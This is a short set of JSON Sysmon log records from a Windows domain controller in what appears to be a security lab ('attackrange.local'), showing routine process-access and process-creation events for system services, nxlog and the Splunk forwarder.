{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8916,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.591\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-00102CE10E00}\r\nTargetProcessId: 4900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.591","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-00102CE10E00}","TargetProcessId":"4900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8917,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.685\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.685","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8918,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.873\r\nProcessGuid: {E2A3D6B1-13A5-5F25-0000-001030E01000}\r\nProcessId: 1364\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.873","ProcessGuid":"{E2A3D6B1-13A5-5F25-0000-001030E01000}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8919,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.873\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1392-5F25-0000-0010DA171000}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.873","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1392-5F25-0000-0010DA171000}","TargetProcessId":"1364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8920,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.873\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1392-5F25-0000-0010DA171000}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.873","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1392-5F25-0000-0010DA171000}","TargetProcessId":"1364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8921,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8922,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8923,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
